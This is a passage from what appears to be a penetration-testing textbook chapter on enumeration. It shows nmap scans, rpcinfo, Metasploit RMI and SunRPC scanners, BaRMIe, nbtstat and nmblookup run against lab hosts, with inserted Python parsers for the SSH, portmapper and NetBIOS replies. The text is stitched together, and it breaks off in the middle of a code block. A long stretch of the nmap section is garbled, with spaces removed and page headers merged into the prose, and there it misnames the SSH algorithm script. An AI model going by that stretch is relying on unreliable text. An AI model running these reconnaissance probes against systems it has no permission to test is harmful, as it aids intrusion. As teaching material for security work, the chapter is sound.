Because we are working on enumeration, we are going to take a close look at a few protocols as well as the tools you would use with those protocols. For a start, there is the Server Message Block (SMB) protocol. This is used on Windows systems for file and resource sharing as well as some remote management. This is definitely a case where users would have to authenticate against the service, so we can spend some time trying to find users on Windows servers. Additionally, you may be able to identify security policy information associated with the Windows domain. Certainly, you should be able to identify file shares where there are some.

Other protocols you may not think about when it comes to enumeration are the Simple Mail Transfer Protocol (SMTP) and the Simple Network Management Protocol (SNMP). It's common for users to have to authenticate and be authorized before sending email through an SMTP server, particularly if they are sending from outside the network where the mail server is. If you use a traditional mail client to connect with Gmail or Office 365, you are familiar with having to provide your username and password for your SMTP server. Your client may automatically fill that information in for you, but it's there if you go looking at settings. SNMP can provide a lot of information about systems. If you can get access to an SNMP system, you should be able to walk the management information base (MIB) to extract details from your target system. There are tools that will perform this walk for you, retrieving the information and presenting it to you.

The MITRE ATT&CK Framework categorizes enumeration under the Reconnaissance phase. It currently identifies Gather Victim Host Information and Gather Victim Identity Information as two techniques that would broadly fit into the enumeration category.

By the time we are done with this chapter, you should have a solid understanding of what enumeration is as well as what tools you can use to enumerate different resources on systems. Many of these tools will be Linux-based and run from the command line, but there are some Windows tools we'll look at as well.

Service Enumeration

When you are scanning systems, nmap is always your friend. The same is true when it comes to service enumeration. This means you are identifying the service running on the target system. A quick way to do that is to use the version scan built into nmap. In the following code listing, you can see a portion of output from a version scan run by nmap on hosts on my network. A version scan is performed by using -sV as the parameter sent to nmap. It shows not just open ports but also where it can find them and specifics about the services and versions that are running on the hosts that were found responding on the network. It does this by looking at any application banners to extract details about the service name and version.

Nmap Version Scan

PORT    STATE  SERVICE VERSION
22/tcp  open   ssh     OpenSSH 7.7p1 Debian 3 (protocol 2.0)
25/tcp  closed smtp
80/tcp  open   http    Greenbone Security Assistant
443/tcp closed https
MAC Address: 0E:76:03:B8:2A:BA (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
N
mapscanreportfordesktop-­3rgc5h2.lan(192.168.86.60)Hostisup(0.025slatency).PORTSTATESERVICEVERSION22/tcpfilteredssh25/tcpfilteredsmtp80/tcpfilteredhttp443/tcpfilteredhttpsMACAddress:C4:9D:ED:AB:DD:7A(Microsoft)Nmapscanreportformilobloom.lan(192.168.86.61)Hostisup(0.94slatency).224 Chapter6  Enumeration■PORTSTATESERVICEVERSION22/tcpopensshOpenSSH7.6(protocol2.0)25/tcpclosedsmtp80/tcpclosedhttp443/tcpclosedhttpsMACAddress:B8:09:8A:C7:13:8F(Apple)Asyoucansee,notallservicesprovidedetailsaboutwhattheyare.Wecanidentifytheservicebutnottheapplicationortheversioninmostcases.OnethingwecanseeinthepreviouslistingisahandfulofsystemsthatarerunningSecureShell(SSH).NotalloftheSSHserversprovidedversionsorevenprotocols.Fortunately,wecanmakeuseofnmapagainformoredetailsaboutSSH.nmaphasscriptingcapabilities,andtherearealotofscriptsthatwillenumerateservicesformoredetails.OneofthesescriptswillenumeratealgorithmsthataresupportedbytheSSHserver.SSHencryptsdatabetweentheclientandtheserver,buttheciphersuitesusedmayvarybetweenconnections,sinceclientscansupportdifferentkeystrengthsandalgorithms.HereyoucanseetheuseofthescriptusedtoenumeratethealgorithmsacrossSSHservers,ssl-­enum-­ciphers.nse.SSH2AlgorithmEnumerationPORTSTATESERVICE22/tcpopenssh|ssh2-­enum-­algos:|kex_algorithms:(10)|curve25519-­sha256|curve25519-­[email protected]|ecdh-­sha2-­nistp256|ecdh-­sha2-­nistp384|ecdh-­sha2-­nistp521|diffie-­hellman-­group-­exchange-­sha256|diffie-­hellman-­group16-­sha512|diffie-­hellman-­group18-­sha512|diffie-­hellman-­group14-­sha256|diffie-­hellman-­group14-­sha1|server_host_key_algorithms:(5)|ssh-­rsa|rsa-­sha2-­512|rsa-­sha2-­256|ecdsa-­sha2-­nistp256|ssh-­ed25519|encryption_algorithms:(6)|chacha20-­[email protected]ServiceEnumeration 225|aes128-­ctr|aes192-­ctr|aes256-­ctr|aes128-­[email protected]|aes256-­[email protected]|mac_algorithms:(10)|umac-­64-­[email protected]|umac-­128-­[email protected]|hmac-­sha2-­256-­[email protected]|hmac-­sha2-­512-­[email protected]|hmac-­sha1-­[email 
protected]|umac-­[email protected]|umac-­[email protected]|hmac-­sha2-­256|hmac-­sha2-­512|hmac-­sha1|compression_algorithms:(2)|none|_[email protected]MACAddress:0E:76:03:B8:2A:BA(Unknown)Youwillseeacollectionofalgorithmtypesintheoutput.Thefirstsetofalgorithmsisforkeyexchange.OneofthemistheDiffie-­Hellmanalgorithm,namedforWhitfieldDiffieandMartinHellman,whowerethefirsttopublishanalgorithmforkeyexchange.Thekeyexchangealgorithmisimportantbecausethekeyisessentialforencryption,anditisgeneratedatthetimeaconnectionismade.Youcanalsoseetheencryptionalgorithmslisted.MostofthesearetheAdvancedEncryptionStandard(AES),thoughyou’llnoticeoneisnamedChaCha20.ThisisastreamcipherlikeAESthatcanallowprogramstouseencryptionwithouttheneedforanopensourceencryptionlibrary.Finally,thereisthemessageauthenticationcode,usedtoensurethatthemessagewasn’ttamperedwithorcorrupted.DiffieandHellmanwerethefirsttopublishakeyexchangealgorithm,buttheywerenotthefirsttodevelopone.GovernmentintelligenceagencieshadalreadycomeupwithkeyexchangealgorithmsseparatelyfromDiffieandHellman.Thedifferencewasthattheagencyemployeeswereunabletopublishbecausetheirworkcouldn’tbedisclosedoutsidetheagency.Certainlynmapcanprovideyouwithagoodstartongettingalistofservicesandversionnumbers,butit’snotalwaysenough.Thereismuchmorethatcanbeacquiredaboutdifferentservices.Thisisanareathatnmapcanhelpwiththroughtheuseofscriptsthatareinstalledwithnmap.Thesescriptscanbeusedtoextractalotofinformation,likethealgorithmsinSSH,thatareotherwisedifficulttoattain.SSHmayprovideencryptionservices,226 Chapter6  
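The review the previous paragraph calls for can be automated. The checker below is an added example, not code from the book or part of nmap: it parses the text of an ssh2-enum-algos result (a trimmed copy of the listing above is embedded as constructed sample input) and flags the algorithms that depend on SHA-1 or MD5, CBC-mode and legacy ciphers, the 1024-bit DH group and the ssh-dss host key type. The rule table and its reasons are my own choices for a review baseline, not anything nmap emits.

```python
"""Parse nmap ssh2-enum-algos output and flag legacy algorithms.

Added example (not from the book or from nmap): reads the NSE output
text and reports the algorithms a reviewer would normally flag.
"""
import re

# Constructed sample: the ssh2-enum-algos block from the chapter, trimmed.
SAMPLE_OUTPUT = """\
| ssh2-enum-algos:
|   kex_algorithms: (10)
|       curve25519-sha256
|       curve25519-sha256@libssh.org
|       ecdh-sha2-nistp256
|       diffie-hellman-group-exchange-sha256
|       diffie-hellman-group14-sha1
|   server_host_key_algorithms: (5)
|       ssh-rsa
|       rsa-sha2-512
|       ecdsa-sha2-nistp256
|       ssh-ed25519
|   encryption_algorithms: (6)
|       chacha20-poly1305@openssh.com
|       aes128-ctr
|       aes256-gcm@openssh.com
|   mac_algorithms: (10)
|       umac-64-etm@openssh.com
|       hmac-sha2-256-etm@openssh.com
|       hmac-sha1-etm@openssh.com
|       hmac-sha1
|   compression_algorithms: (2)
|       none
|_      zlib@openssh.com
"""

# Review rules (my own baseline): regex on the algorithm name, and the reason.
WEAK_RULES = {
    "kex_algorithms": [
        (r"-sha1$", "SHA-1 based key exchange"),
        (r"^diffie-hellman-group1-", "1024-bit DH group"),
    ],
    "server_host_key_algorithms": [
        (r"^ssh-rsa$", "RSA host key signatures using SHA-1"),
        (r"^ssh-dss$", "DSA host keys (1024-bit)"),
    ],
    "encryption_algorithms": [
        (r"-cbc$", "CBC mode cipher"),
        (r"^(3des|arcfour|blowfish)", "legacy cipher"),
    ],
    "mac_algorithms": [
        (r"hmac-sha1", "SHA-1 based MAC"),
        (r"hmac-md5", "MD5 based MAC"),
        (r"-96(-etm@openssh\.com)?$", "truncated MAC tag"),
    ],
}


def parse_enum_algos(text):
    """Return {category: [algorithm, ...]} from ssh2-enum-algos output."""
    algos = {}
    current = None
    for raw in text.splitlines():
        line = raw.lstrip("|_ ").strip()  # drop the NSE tree prefix
        if not line or line.startswith("ssh2-enum-algos"):
            continue
        header = re.match(r"^(\w+_algorithms): \(\d+\)$", line)
        if header:
            current = header.group(1)
            algos[current] = []
        elif current:
            algos[current].append(line)
    return algos


def flag_weak_algorithms(algos):
    """Return a list of (category, algorithm, reason) for every rule hit."""
    findings = []
    for category, names in algos.items():
        for name in names:
            for pattern, reason in WEAK_RULES.get(category, []):
                if re.search(pattern, name):
                    findings.append((category, name, reason))
                    break  # one reason per algorithm is enough
    return findings


if __name__ == "__main__":
    for category, name, reason in flag_weak_algorithms(parse_enum_algos(SAMPLE_OUTPUT)):
        print("%s: %s (%s)" % (category, name, reason))
```

Feed it the saved output of `nmap --script ssh2-enum-algos -p 22 <target>` and the finding list is what goes into the report; the point is that the server's offer, not the negotiated choice of one client, is what you assess.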
Remote Procedure Calls

A remote procedure call (RPC) is a service that allows remote systems to consume procedures external to the application calling them. A program on system A can call a function or procedure on another system across the network. It does this using the RPC protocol. As far as the program on the local computer calling the remote procedure is concerned, it's a local procedure existing in the same process space as the rest of the code. The program calls this procedure, gets the information, and proceeds on its merry way. RPCs provide a way for two processes to communicate with one another. Remote commonly means a remote server, but two local processes could also use RPCs to communicate with one another.

Sun RPC

The idea of interprocess communication has been around for decades. There have been several implementations of request-response protocols over the decades. Java's remote method invocation (RMI) is a recent example of this. Before that, there was the Common Object Request Broker Architecture (CORBA), which was independent of language implementation. Sometimes, with RPCs, you need what is essentially a directory service to indicate the dynamic ports on which different services are running. A common implementation of remote procedure calls is the program portmap, also known as rpcbind. This program provides information about programs that have been registered with the portmapper service, that is, the programs providing the remote procedures. Each RPC service binds a port, frequently a dynamically assigned one, and registers its program number, version and port with the portmapper, which, when queried, hands that information back. Common examples of services that use rpcbind/portmap are file sharing servers like the Network File System (NFS). The portmapper itself listens on the well-known port 111, on both TCP and UDP, and the package that provides it usually ships utilities that speak RPC as well. To identify programs and their associated ports on a remote system, you can use the program rpcinfo. You can see an example of its use here. The command used, rpcinfo -p, has rpcinfo probe the host provided. In this case, the host is an IP address rather than a hostname.

rpcinfo List

$ rpcinfo -p 192.168.86.52
   program vers proto   port  service
    100000    4   tcp    111  portmapper
    100000    3   tcp    111  portmapper
    100000    2   tcp    111  portmapper
    100000    4   udp    111  portmapper
    100000    3   udp    111  portmapper
    100000    2   udp    111  portmapper
    100005    1   udp  43939  mountd
    100005    1   tcp  58801  mountd
    100005    2   udp  46384  mountd
    100005    2   tcp  50405  mountd
    100005    3   udp  49030  mountd
    100005    3   tcp  50553  mountd
    100003    3   tcp   2049  nfs
    100003    4   tcp   2049  nfs
    100227    3   tcp   2049  nfs_acl
    100003    3   udp   2049  nfs
    100227    3   udp   2049  nfs_acl
    100021    1   udp  34578  nlockmgr
    100021    3   udp  34578  nlockmgr
    100021    4   udp  34578  nlockmgr
    100021    1   tcp  39297  nlockmgr
    100021    3   tcp  39297  nlockmgr
    100021    4   tcp  39297  nlockmgr

The programs shown here that have remote procedures registered with rpcbind are associated with the NFS file sharing server. The portmapper is the primary service that is queried for additional data, but the others, like mountd, nfs, and nlockmgr, are all needed for NFS. NFS was developed by Sun Microsystems. The portmapper is an implementation of RPC that was also associated with Sun, so you may sometimes see it referred to as Sun RPC. This is the case with a scanner in Metasploit that can also be used to identify the ports allocated to programs using the portmapper.

Metasploit sunrpc Scanner

msf > use auxiliary/scanner/misc/sunrpc_portmapper
msf auxiliary(scanner/misc/sunrpc_portmapper) > set RHOSTS 192.168.86.52
RHOSTS => 192.168.86.52
msf auxiliary(scanner/misc/sunrpc_portmapper) > run

[+] 192.168.86.52:111 - SunRPC Programs for 192.168.86.52
=================================

  Name      Number  Version  Port   Protocol
  ----      ------  -------  ----   --------
  mountd    100005  1        43939  udp
  mountd    100005  1        58801  tcp
  mountd    100005  2        46384  udp
  mountd    100005  2        50405  tcp
  mountd    100005  3        49030  udp
  mountd    100005  3        50553  tcp
  nfs       100003  3        2049   tcp
  nfs       100003  4        2049   tcp
  nfs       100003  3        2049   udp
  nfs_acl   100227  3        2049   tcp
  nfs_acl   100227  3        2049   udp
  nlockmgr  100021  1        34578  udp
  nlockmgr  100021  3        34578  udp
  nlockmgr  100021  4        34578  udp
  nlockmgr  100021  1        39297  tcp
  nlockmgr  100021  3        39297  tcp
  nlockmgr  100021  4        39297  tcp
  rpcbind   100000  4        111    tcp
  rpcbind   100000  3        111    tcp
  rpcbind   100000  2        111    tcp
  rpcbind   100000  4        111    udp
  rpcbind   100000  3        111    udp
  rpcbind   100000  2        111    udp

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

As we are scanning the same host, it's not unexpected that we'd get the same results using the Metasploit module as we got from rpcinfo. Since all that is happening is a query to the portmapper process, you can use whatever tool makes you the most comfortable. There are a couple of advantages to using these tools over a plain nmap port scan. The first is that you'll get the program name by checking with the portmapper. The second is that you won't see all of these ports with nmap unless you specifically ask it to scan all ports: the dynamically assigned ports handed out to RPC services aren't in the list of well-known ports that nmap scans by default. nmap's own rpcinfo script asks the portmapper the same question, so combining a port scan with --script rpcinfo covers both.
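What rpcinfo -p and the sunrpc_portmapper module both do on the wire is a single ONC RPC call, PMAPPROC_DUMP (program 100000, version 2, procedure 4). The code below is an added example, not from the book, Metasploit or the rpcbind package: it builds that call as RFC 1057 and RFC 1833 lay it out, parses the reply into the same program/version/protocol/port tuples rpcinfo prints, and formats them the same way. The reply it parses offline is constructed from a few rows of the listing above; query_portmapper() performs the identical exchange against a live host over UDP port 111 (over TCP, each message is prefixed with a 4-byte record mark, which this example does not implement).

```python
"""Build a portmapper DUMP request and parse the reply (RFC 1057 / RFC 1833).

Added example (not from the book, Metasploit or rpcinfo): what `rpcinfo -p`
sends to port 111 and how the reply lists program/version/protocol/port.
Runs offline against a constructed reply; query_portmapper() is a live UDP query.
"""
import socket
import struct

PMAP_PROG, PMAP_VERS, PMAPPROC_DUMP = 100000, 2, 4
IPPROTO_TCP, IPPROTO_UDP = 6, 17
# Well-known program numbers, so the parsed list reads like rpcinfo output.
PROGRAM_NAMES = {100000: "portmapper", 100003: "nfs", 100005: "mountd",
                 100021: "nlockmgr", 100227: "nfs_acl"}


def build_dump_call(xid):
    """ONC RPC CALL: xid, CALL(0), rpcvers 2, prog, vers, proc, AUTH_NULL cred and verf."""
    return struct.pack(">10I", xid, 0, 2, PMAP_PROG, PMAP_VERS, PMAPPROC_DUMP,
                       0, 0,   # credential: flavor AUTH_NULL, body length 0
                       0, 0)   # verifier:   flavor AUTH_NULL, body length 0


def parse_dump_reply(data, xid):
    """Return [(prog, vers, 'tcp'|'udp', port), ...] from a PMAPPROC_DUMP reply.

    Raises ValueError if the xid does not match or the call was not accepted.
    """
    r_xid, msg_type, reply_stat, _verf_flavor, verf_len = struct.unpack_from(">5I", data, 0)
    if r_xid != xid or msg_type != 1:
        raise ValueError("not a reply to our call")
    if reply_stat != 0:
        raise ValueError("call rejected (MSG_DENIED)")
    off = 20 + verf_len  # skip the verifier body (AUTH_NULL has none)
    (accept_stat,) = struct.unpack_from(">I", data, off)
    off += 4
    if accept_stat != 0:
        raise ValueError("call not accepted, accept_stat=%d" % accept_stat)
    protos = {IPPROTO_TCP: "tcp", IPPROTO_UDP: "udp"}
    mappings = []
    while True:  # pmaplist: value_follows, then (prog, vers, prot, port); 0 terminates
        (more,) = struct.unpack_from(">I", data, off)
        off += 4
        if not more:
            break
        prog, vers, prot, port = struct.unpack_from(">4I", data, off)
        off += 16
        mappings.append((prog, vers, protos.get(prot, str(prot)), port))
    return mappings


def format_like_rpcinfo(mappings):
    """Render the mapping list in the column layout rpcinfo -p uses."""
    lines = ["   program vers proto   port  service"]
    for prog, vers, proto, port in mappings:
        lines.append("%10d %4d %5s %6d  %s" % (prog, vers, proto, port,
                                              PROGRAM_NAMES.get(prog, "")))
    return "\n".join(lines)


def query_portmapper(host, timeout=3.0):
    """Live UDP query of the portmapper on port 111 (not exercised by the tests)."""
    xid = 0x5EED1234
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_dump_call(xid), (host, 111))
        data, _ = sock.recvfrom(65535)
    return parse_dump_reply(data, xid)


def _constructed_reply(xid, mappings):
    """Build a reply the way rpcbind would; constructed test data, not a capture."""
    body = struct.pack(">6I", xid, 1, 0, 0, 0, 0)  # REPLY, MSG_ACCEPTED, AUTH_NULL verf, SUCCESS
    for prog, vers, prot, port in mappings:
        body += struct.pack(">5I", 1, prog, vers, prot, port)
    return body + struct.pack(">I", 0)


# Constructed sample mirroring four rows of the chapter's rpcinfo -p listing.
SAMPLE_REPLY = _constructed_reply(0x5EED1234, [
    (100000, 4, IPPROTO_TCP, 111), (100005, 1, IPPROTO_UDP, 43939),
    (100003, 3, IPPROTO_TCP, 2049), (100021, 4, IPPROTO_TCP, 39297),
])

if __name__ == "__main__":
    print(format_like_rpcinfo(parse_dump_reply(SAMPLE_REPLY, 0x5EED1234)))
```

The xid check matters in practice: on UDP the reply is unauthenticated, so a response that does not carry the transaction id you sent is either a stale datagram or someone answering on the portmapper's behalf, and it should be discarded rather than parsed.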
Remote Method Invocation

Java programs are very popular, especially when it comes to web applications. Java provides a lot of assistance to programmers, especially when it comes to libraries and interfaces that can be implemented with your own functionality. Java includes its own capability for remote procedure calls, though in Java it's called remote method invocation. To have a program that uses RMI, the system needs a version of the portmapper for Java called the rmiregistry. The program using RMI registers itself with the rmiregistry program. This means that anyone can check with the rmiregistry to see what services are offered. The rmiregistry program will respond in a similar way to what we saw when we checked with the portmapper.

It's said that RMI is the object-oriented version of RPC. This means objects get passed between the server and the client. The client implements a stub through an interface. An interface, in object-oriented terms, is a declared set of methods that a class promises to implement. The stub communicates with a skeleton on the server. When a programmer is creating a program that uses RMI, they use an RMI compiler (the program rmic). The programs we use to connect to an RMI registry and enumerate the services registered there don't need to know the specific interfaces needed to pass objects between the skeleton and the stub, because the only thing the enumeration is doing is identifying the skeletons, or services, on the remote system.

We'll start with Metasploit to run a scan on a system that has RMI. You can see an example of using Metasploit for RMI enumeration here.

Running RMI Scanner in Metasploit

msf > use auxiliary/gather/java_rmi_registry
msf auxiliary(gather/java_rmi_registry) > show options

Module options (auxiliary/gather/java_rmi_registry):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  1099             yes       The target port (TCP)

msf auxiliary(gather/java_rmi_registry) > set RHOST 192.168.86.62
RHOST => 192.168.86.62
msf auxiliary(gather/java_rmi_registry) > run

[*] 192.168.86.62:1099 - Sending RMI Header...
[*] 192.168.86.62:1099 - Listing names in the Registry...
[+] 192.168.86.62:1099 - 1 names found in the Registry
[+] 192.168.86.62:1099 - Name HelloServer (HelloImpl_Stub) found on 127.0.1.1:38371
[*] Auxiliary module execution completed

The options required to run the java_rmi_registry module are simple. The remote port defaults to 1099, which is the port rmiregistry listens on. If you think the registry is listening on another port, you can set the RPORT variable. The one that is essential, though, is RHOST. We set this variable to the IP address of the system where there is a simple Java program that implements an RMI server. You can see the result of the scan. According to the RMI registry, there is a server named HelloServer. It even tells us that the stub class is named HelloImpl_Stub. Even though it's a server, what the registry hands out is a stub, the client-side proxy for the object; stub and skeleton are just the two ends of the same conversation. rmic generates the stub class (and, for older JDKs, the skeleton as well); referring to the server end as the skeleton simply differentiates between the two.

Metasploit is not the only way you can scan for RMI services. If you look around a little, you can find additional programs. One of these is called Barmie, stylized as BaRMIe to highlight the RMI in the name. You can grab the source code as well as a precompiled build of BaRMIe through GitHub. Running the program is straightforward. Since it's a Java program, you run its compiled bytecode with the java launcher, which starts a Java virtual machine. Since it's stored as a Java archive (JAR), you have to tell java that it is running a JAR file with -jar. The program does need to know what host it's scanning, so you pass in the IP address of your target. You can see a run of BaRMIe next.

The program javac is used to compile Java source code to an intermediate bytecode file. The program java is used to execute that bytecode.

Using BaRMIe

# java -jar BaRMIe_v1.01.jar 192.168.86.62

v1.0  Java RMI enumeration tool.
      Written by Nicky Bloor (@NickstaDB)

Warning: BaRMIe was written to aid security professionals in identifying the
         insecure use of RMI services on systems which the user has prior
         permission to attack. BaRMIe must be used in accordance with all
         relevant laws. Failure to do so could lead to your prosecution.
         The developers assume no liability and are not responsible for any
         misuse or damage caused by this program.

Scanning 1 target(s) for objects exposed via an RMI registry...

[-] An exception occurred during the PassThroughProxyThread main loop.
    java.net.SocketException: Socket closed
[-] An exception occurred during the ReplyDataCapturingProxyThread main loop.
    java.net.SocketException: Socket closed

RMI Registry at 192.168.86.62:1099
Objects exposed: 1

Object 1
  Name: HelloServer
  Endpoint: 127.0.1.1:38371
  [+] Object is bound to localhost, but appears to be exposed remotely.
  Classes: 3
    Class 1
      Classname: java.rmi.server.RemoteStub
    Class 2
      Classname: java.rmi.server.RemoteObject
    Class 3
      Classname: HelloImpl_Stub

1 potential attacks identified (+++ = more reliable)
[---] Java RMI registry illegal bind deserialization

0 deserialization gadgets found on leaked CLASSPATH
[~] Gadgets may still be present despite CLASSPATH not being leaked

Successfully scanned 1 target(s) for objects exposed via RMI.

We see a couple of things from running this program. It's a little more verbose than Metasploit is. We get the name of the server, HelloServer. Just as with Metasploit, we see that the object's endpoint is 127.0.1.1 on port 38371, a port dynamically allocated when the object was exported. We also see the inheritance tree: references to the classes java.rmi.server.RemoteStub, java.rmi.server.RemoteObject, and HelloImpl_Stub. BaRMIe's note is the interesting part. The stub advertises a loopback endpoint, which no remote client could use, yet the registry itself answered a remote query and handed that stub out, so the object is presumably listening on the host's real interfaces as well. At a minimum we have information leakage, and a loopback address in a stub is a common sign of a service whose authors never considered exposure. To go further and identify or exploit vulnerabilities in that RMI server, we need to gain access to the system.

In identifying the RMI registry and the additional services, we have also identified the existence of another piece of software on the target system. It may seem obvious now, but if you find an RMI registry and RMI services, you have found a system that at least has a Java Runtime Environment (JRE) on it, if not a Java Development Kit (JDK). What we don't know from the output here is the version of the JRE or JDK. However, there have been vulnerabilities in Java implementations over the last few years. Knowing there is at least a JRE on the system may have given you a lead to vulnerabilities.

Server Message Block

The most common implementation of remote procedure calls you will run across is the one used in Windows networks. The SMB protocol is complex when you consider all the different ways it can be used and all the different ways it will operate. You may be most familiar with SMB as the protocol used to share files across a network. While this is definitely one use for SMB, it is not the only one, and even when you think about sharing files, there is a lot more to it than just transmitting file contents across a network.

SMB is an Application layer protocol that can operate over different protocols at lower layers. First, it can operate directly over TCP without any other Session layer protocol. If a system is running SMB directly over TCP, you will find TCP port 445 open. SMB can also operate over a session protocol, NetBIOS, an application programming interface (API) originally developed for IBM to extend input/output (I/O) capabilities away from the local system and onto the network. When NetBIOS is carried over TCP/IP (NBT), the name service uses UDP port 137, the datagram service uses UDP port 138, and the session service uses TCP port 139. SMB rides inside that session service, so finding TCP 139 open tells you that you have found SMB over NetBIOS, and UDP 137 tells you that NetBIOS is also providing name resolution.

So, just what is SMB good for? SMB is used for communicating between Windows systems: file sharing, network management, system administration. This may mean managing the naming of systems to be certain there aren't conflicts. Management like this requires that systems announce themselves to the local network. SMB also has to support authentication so systems aren't wide open to the entire network. This means SMB knows about users and groups. It also knows about shares, which are directories that are exposed to the network.
Systems have to be able to provide the list of shares they are exporting to the network to systems that ask. This allows a user to get a list of shares and then access the ones they want, after authentication. Authentication is not always necessary. SMB supports something called null authentication, a null session. What this means is that there are some functions that don't require a username and password. A system can request information about another system on the network using a null session, meaning no credentials were passed. This null authentication can allow us to gather a lot of information about the system.

We can use several different tools to enumerate information on Windows systems. Actually, it's not even just Windows systems, though the intent of implementing SMB on other systems is to interoperate with Windows systems. Samba is a package that can be installed on Unix-like operating systems, providing SMB as well as a NetBIOS naming service. There are two separate processes that are used by Samba. One is smbd, which handles SMB, and there is also nmbd, which handles the naming aspects of interoperating with Windows systems. This means that even while we are looking to enumerate information from Windows systems, we can also scoop up Unix-like systems.

The first place to start is the built-in tools. Built-in tools are especially available on Windows systems, but there are Unix-like utilities as well. We will also look at a number of scripts available for nmap to gather information. Metasploit, not surprisingly, has several modules for scanning SMB systems. There are also some other utilities you can use, and we'll take a look at some of those.

Built-in Utilities

If you are on a Windows system, there are a number of utilities that you can make use of to gather information using SMB. Analogs exist for Linux as well. One thing to make note of with regard to the built-in utilities is that you need to be on the same broadcast domain to make use of most of them. NetBIOS was originally developed to be used in a local area network, without the concept of wide area networks built in. As a result, some of the functions work because systems rely on broadcasting information to the network. The implication of this is that you need to have a presence on the local network before these utilities will work.

Gathering NetBIOS statistics can be accomplished by using the program nbtstat. This allows you to gather data about the local network. In the following example, you can see the use of nbtstat to acquire data about a remote system. Using nbtstat -a presents the name table for the hostname provided. If all we knew was the IP address of the remote system, we could use nbtstat -A instead. What you'll see is that we get different pieces of information. You get a list of names down the left side, followed by a code. The code indicates the context in which the name exists, followed by the status of each name.

nbtstat Output

C:\Users\kilroy>nbtstat -a billthecat

Local Area Connection:
Node IpAddress: [192.168.86.50] Scope Id: []

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    BILLTHECAT     <00>  UNIQUE      Registered
    BILLTHECAT     <20>  UNIQUE      Registered
    WORKGROUP      <00>  GROUP       Registered

    MAC Address = AC-87-A3-36-D6-AA

The codes shown are the NetBIOS name suffixes, and you can look up the code to determine what the name is associated with. Systems that use SMB have a number of contexts in which they can exist. What you see here is a system that is both a workstation (<00>, the Workstation Service) and a file server (<20>, the File Server Service). This means that file sharing has been enabled on this system. Additionally, though, the system acts as a workstation or client on the network. It's important to distinguish the capabilities because then each system can know the types of questions that can be asked of each of the other systems. In technical terms, each set of functionality has procedures associated with it. We can't call procedures that don't exist, so before procedures are called on the remote systems to initiate an action, we have to know what procedures are available. nbtstat -a essentially provides that information.

What we've seen so far simply asks for all the functions (names) associated with a hostname on the network. That's one individual system. If we want to see all the hostnames that are talking SMB/NetBIOS, we need to ask for something else. We can still use nbtstat; we just pass a different parameter on the command line. We are looking for resolved names. This list can come from broadcast messages when there is no centralized database for name lookups: systems announce their names and their presence when they come online and then periodically after that. It can also come from the Windows Internet Name Server (WINS), which is a central repository of the names of systems on an enterprise network. Windows servers can provide WINS functionality, so systems register with the WINS and all names can be resolved. In the following listing, you can see a list of names on the network. Since there is no Windows server and, as a result, no WINS on the network, these are all names that have been identified through broadcast messages. These systems are all macOS, but they are sharing files on the network using SMB. To do that, they need to behave like any other system that communicates using SMB.

Listing Resolved Names with nbtstat

C:\Users\kilroy>nbtstat -r

    NetBIOS Names Resolution and Registration Statistics
    ----------------------------------------------------

    Resolved By Broadcast     = 47
    Resolved By Name Server   = 0

    Registered By Broadcast   = 8
    Registered By Name Server = 0

    NetBIOS Names Resolved By Broadcast
    ---------------------------------------------
           YAZPISTACHIO
           BILLTHECAT
           YAZPISTACHIO
           YAZPISTACHIO
           LOLAGRANOLA
           LOLAGRANOLA
           YAZPISTACHIO
           YAZPISTACHIO

There are other functions that nbtstat offers, but they are more related to the functionality of the local system and less relevant for enumeration. While nbtstat has a lot of functionality, it is, as noted earlier, only on Windows systems. There are other tools you can use if you aren't running on Windows. If you have a Linux system and have the Samba package installed, which provides services that allow Linux to communicate using SMB, you can make use of the tool nmblookup. This can be used to do lookups of names on the network. It can be used to query WINS as well as look up names where the systems are just broadcasting their information. For example, to get the details about the system billthecat as we did earlier, you would use nmblookup -S -B 192.168.86.255 billthecat, as you can see here.

nmblookup for Enumeration

$ nmblookup -S -B 192.168.86.255 billthecat
Can't load /etc/samba/smb.conf - run testparm to debug it
querying billthecat on 192.168.86.255
192.168.86.32 billthecat<00>
Looking up status of 192.168.86.32
        BILLTHECAT      <00> -         H <ACTIVE>
        BILLTHECAT      <20> -         H <ACTIVE>
        WORKGROUP       <00> - <GROUP> H <ACTIVE>

        MAC Address = AC-87-A3-36-D6-AA

Using -B tells nmblookup to send the query to the broadcast address that is supplied, which is just the broadcast address of the local network. To use WINS instead, you would use -R to request a recursive lookup of the name and -U to name the WINS server to ask. The flag -S tells nmblookup to get a node status in addition to just the name lookup, and it is this flag that provides the name table with the suffixes. Just as we did earlier, we can see that we have a workstation (<00>) and also a file server (<20>). You'll also see from this output, just as we did earlier, that the system belongs to the workgroup WORKGROUP. Workgroups are used for ad hoc Windows networks where there is no domain controller to manage all of the systems.

Using the net Utility

One program that's built into Windows is the net utility. This is widely used for several purposes. If you wanted to connect to a shared drive on the network, you would use net use to connect to that shared drive. The net command allows you to query the network using SMB messages. As an example, the output that follows shows statistics from the workstation service on a Windows server. This shows information about network communication primarily, including bytes transferred. It can also show you the number of sessions that have been started and the sessions that have failed.

PS C:\Users\kilroy> net statistics workstation
Workstation Statistics for \\SERVER2020

Statistics since 1/1/2021 6:08:25 PM

  Bytes received                           2994818
  Server Message Blocks (SMBs) received    856
  Bytes transmitted                        150810
  Server Message Blocks (SMBs) transmitted 118
  Read operations                          0
  Write operations                         0
  Raw reads denied                         0
  Raw writes denied                        0

  Network errors                           0
  Connections made                         0
  Reconnections made                       0
  Server disconnects                       0

  Sessions started                         0
  Hung sessions                            0
  Failed sessions                          0
  Failed operations                        0
  Use count                                687
  Failed use count                         0

The command completed successfully.

Additionally, you can extract information about the configuration of the system with net config workstation, which includes the computer name, the software version, and the domain the computer has been joined to. One downside to this utility, though, is that you need to be on the local network and probably have to be joined to the domain. This is realistic if you have already compromised a system and are looking to pivot to another system on the network.
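Both nbtstat -A and nmblookup -S send the same thing: a NetBIOS node status request (NBSTAT) for the wildcard name "*" to UDP port 137, and then decode the name table that comes back. The code below is an added example, not from the book, Windows or Samba: it builds that request as RFC 1002 describes it, parses a response, decodes the 16th-byte suffix that distinguishes the Workstation Service (<00>) from the File Server Service (<20>), and pulls the MAC address out of the statistics block. The response it parses offline is constructed to mirror the billthecat output above; node_status() performs the live query.

```python
"""Build a NetBIOS node status request and decode the name table reply.

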